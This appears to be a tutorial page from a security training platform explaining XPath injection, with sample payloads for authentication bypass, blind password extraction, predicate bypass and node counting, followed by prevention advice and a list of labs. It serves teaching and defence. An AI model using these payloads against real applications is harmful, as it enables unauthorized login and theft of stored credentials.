XPath Injection Guide

Learn how to manipulate XML queries to extract data, bypass authentication, and access restricted information.

๐ŸŽฏ What is XPath?

XPath is a query language for selecting nodes in XML documents. It's used by many applications to query configuration files, user databases stored as XML, and structured data. XPath Injection occurs when user input is directly concatenated into XPath queries without sanitization.

Common in: Legacy systems, configuration parsing, educational platforms, some APIs.

๐Ÿ“„ XPath Basics

XPath queries select nodes from an XML document:

//user[username='admin' and password='secret']

This selects all <user> nodes where both conditions are true. Parts:

  • //user = any <user> element anywhere in document
  • [...] = predicate (filter condition)
  • and/or = boolean operators
  • 'value' = string literal
๐Ÿ’ฅ How XPath Injection Works

When apps build XPath queries with user input:

query = "//user[username='" + username + "' and password='" + password + "']"

An attacker can inject XPath syntax by providing: ' or '1'='1

//user[username='' or '1'='1' and password='...']

The condition '1'='1' is always true, returning the first matching node (usually admin).

๐Ÿ” Common XPath Injection Attacks
1. Authentication Bypass (Boolean Logic)
Input: ' or '1'='1
Query: //user[username='' or '1'='1' and password='...']
Result: First user node returned (authentication bypassed)
2. Data Extraction (String Predicates)
Target: Extract admin password character by character
Payload: ' and starts-with(password, 'a') or '1'='1
Result: If matches, node found; else, no match
3. Bypassing Restrictions (Predicate Manipulation)
Restricted: //user[role='admin' and status='active']
Payload: admin' or '1'='1' or role='
Result: Bypasses status='active' check
4. Counting Nodes (exists() function)
Payload: blah' and count(//user)>5 or '1'='1
Result: Reveals if more than 5 users exist in database
โš ๏ธ Why is XPath Injection Dangerous?
  • Authentication Bypass: Access any account without credentials
  • Data Extraction: Retrieve entire XML databases character by character
  • Privilege Escalation: Assume admin roles or elevated permissions
  • Data Manipulation: Modify XML content if write access exists
  • Information Leakage: Discover document structure and content
๐Ÿ›ก๏ธ How to Prevent XPath Injection
  • Parameterized XPath Queries: Use XPath variables or prepared queries
  • Input Validation: Whitelist allowed characters and formats
  • Escape Special Characters: Remove or escape XPath metacharacters: ', ", [, ], (, ), etc.
  • Use XML Schemas: Validate XML structure before querying
  • Least Privilege: Run XPath queries with minimal permissions
  • Web Application Firewall: Detect common XPath payloads
๐Ÿงช Lab Progression

Demo: Examine XML structure and understand XPath query format with hints

Lab 1 - Login Bypass: Use boolean injection to authenticate without password

Lab 2 - Secret Extraction: Extract hidden admin secrets without using 'admin' account

Lab 3 - Restricted Predicate Bypass: Bypass additional security restrictions via predicate manipulation